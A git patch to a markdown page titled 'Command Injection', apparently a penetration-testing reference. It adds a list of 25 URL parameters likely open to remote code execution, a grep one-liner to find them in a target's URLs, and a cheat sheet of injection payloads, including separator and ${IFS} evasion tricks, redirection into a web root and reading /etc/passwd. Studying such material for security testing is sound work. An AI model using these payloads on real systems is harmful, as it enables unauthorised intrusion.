From 3ef7829710134c3e8c19d0f24b6a5bbbbb27c848 Mon Sep 17 00:00:00 2001 From: Mehdi Date: Fri, 9 Aug 2024 13:15:10 +0330 Subject: [PATCH] Update Command Injection.md --- Command Injection.md | 57 +++++++++++++++++++++++++++++++++++++++++--- 1 file changed, 54 insertions(+), 3 deletions(-) diff --git a/Command Injection.md b/Command Injection.md index 71402de..f0de014 100644 --- a/Command Injection.md +++ b/Command Injection.md @@ -207,9 +207,60 @@ Examine unexpected responses from the server that may indicate the execution of Injection of values ​​such as `$(Whoami)` or `${7*7}` in input parameters. - - - +## Top 25 Remote Code Execution (RCE) Parameters + +Here are the top 25 parameters that could be vulnerable to code injection and similar RCE vulnerabilities + +```bash +?cmd={payload} +?exec={payload} +?command={payload} +?execute{payload} +?ping={payload} +?query={payload} +?jump={payload} +?code={payload} +?reg={payload} +?do={payload} +?func={payload} +?arg={payload} +?option={payload} +?load={payload} +?process={payload} +?step={payload} +?read={payload} +?function={payload} +?req={payload} +?feature={payload} +?exe={payload} +?module={payload} +?payload={payload} +?run={payload} +?print={payload} +``` +* Example +```bash +cat target_all_url.txt | grep -E "?print=|?run=|?payload=|?module=|?exe=|?feature=|?req=|?function=|?read=|?step=|?process=|?load=|?option=|?arg=|?func=|?do=|?reg=|?code=|?jump=|?query=|?ping=|?execute=|?command=|?exec=|?cmd=" +``` +### Command Injection/Execution +```bash +#Both Unix and Windows supported +ls||id; ls ||id; ls|| id; ls || id # Execute both +ls|id; ls |id; ls| id; ls | id # Execute both (using a pipe) +ls&&id; ls &&id; ls&& id; ls && id # Execute 2º if 1º finish ok +ls&id; ls &id; ls& id; ls & id # Execute both but you can only see the output of the 2º +ls %0A id # %0A Execute both (RECOMMENDED) + +#Only unix supported +`ls` # `` +$(ls) # $() +ls; id # ; Chain commands +ls${LS_COLORS:10:1}${IFS}id # Might be useful + +#Not executed but may be interesting +> /var/www/html/out.txt #Try to redirect the output to a file +< /etc/passwd #Try to send some input to the command +```